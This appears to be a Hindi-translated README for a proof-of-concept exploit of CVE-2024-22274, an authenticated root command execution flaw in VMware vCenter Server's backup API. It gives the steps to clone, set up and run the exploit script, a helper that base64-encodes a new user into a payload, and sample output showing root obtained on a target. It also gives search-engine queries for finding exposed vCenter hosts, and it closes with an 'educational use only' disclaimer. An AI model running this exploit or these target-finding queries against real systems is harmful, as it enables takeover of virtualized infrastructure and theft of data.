
PoC - VMware vCenter Server में प्रमाणित रिमोट कोड निष्पादन (Exploit)
“com.vmware.appliance.recovery.backup.job.create” और “com.vmware.appliance.recovery.backup.validate” API घटक एक फ़्लैग इंजेक्शन हमले के प्रति संवेदनशील हैं, जिसका उपयोग लक्षित सिस्टम पर रूट उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करने के लिए किया जा सकता है।
[!NOTE] इस PoC एक्सप्लॉइट के साथ काम करने के लिए, आपके पास वैध क्रेडेंशियल होने चाहिए और SSH के माध्यम से VMware vCenter Server शेल में लॉग इन करना होगा। उपयोगकर्ता के पास "admin" भूमिका होनी चाहिए, जैसा कि
vcenter_creds.txtफ़ाइल में निर्दिष्ट है।
$ git clone https://github.com/l0n3m4n/CVE-2024-22274-RCE.git
$ cd CVE-2024-22274-RCE
$ python3 -m venv venv && source venv/bin/activate
$ pip install -r requirements.txt
user2base64.shको चलाएँ या संशोधित करें ताकि जोड़े गए नए उपयोगकर्ता को base64 में एन्कोड किया जा सके और यह स्वचालित रूप सेpayload.txtबना देगा।
$ bash user2base64.sh
Payload has been encoded to base64, saved payload.txt


$ python3 CVE-2024-22274-RCE.py -t 192.168.56.103 -P 22 -p payload.txt -c vCenter_creds.txt
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
uid=0(root) gid=0(root) groups=0(root)
[+] Exploitation successful: You have root access.
[+] Finished executing commands on 192.168.56.103
इस उदाहरण का मतलब है कि आप कनेक्ट हो रहे हैं लेकिन पेलोड सही ढंग से कॉन्फ़िगर या लोड नहीं किया गया है। अधिक विस्तृत जानकारी के लिए PDF PoC देखें।
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[+] Connected to 192.168.56.103 via SSH
[+] Payload executed successfully. Output:
No privileges escalation detected.
[+] Exploitation failed: Root access not obtained.
[+] Finished executing commands on 192.168.56.103
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: Username or password not found in configuration file.
कृपया होस्ट पता और क्रेडेंशियल जांचें।
___ ___ _______ ______ __
| | | | |.--.--.--.---.-.----.-----.______.--.--.| |.-----.-----.| |_.-----.----.
| | | || | | | _ | _| -__|______| | || ---|| -__| || _| -__| _|
\_____/|__|_|__||________|___._|__| |_____| \___/ |______||_____|__|__||____|_____|__|
Author: l0n3m4n | vCenter RCE: CVE-2024-22274 | PoC: @mbadanoiu
[-] Error: [SSH Error] Connection to 192.168.56.103 failed.
"VMware vCenter", फ़िल्टर: services.port: 443 AND tags: "VMware"title="VMware vCenter", फ़िल्टर: port="443" && title="VMware vCenter""VMware vCenter", फ़िल्टर: port:443 "VMware vCenter"यह एक्सप्लॉइट PoC तब तक प्रभावी नहीं होगा जब तक आप समझ नहीं पाते कि स्क्रिप्ट की व्याख्या कैसे करें, क्योंकि इसे जानबूझकर बदला गया है ताकि "स्क्रिप्ट किडीज़" इसे केवल कॉपी करके बिना समझे नहीं चला सकें। VMware vCenter Server वर्चुअलाइज़्ड वातावरण के प्रबंधन में एक महत्वपूर्ण घटक है, यदि कोई इस तक पहुँच प्राप्त कर लेता है तो वह वर्चुअल इंफ्रास्ट्रक्चर पर पूर्ण नियंत्रण पा सकता है और संवेदनशील डेटा बाहर भेज सकता है। यह PoC उन लोगों के लिए डिज़ाइन किया गया है जिनके पास पहले से थोड़ी तकनीकी विशेषज्ञता है, ताकि वे इसका सही उपयोग कर सकें। इसलिए यदि आप स्क्रिप्ट किडी हैं जो बिना प्रभाव समझे नुकसान पहुँचाना चाहते हैं, तो यह एक्सप्लॉइट आपके लिए उपयोगी नहीं होगा।
यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। निर्माता टूल के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है। समस्या बनाएँ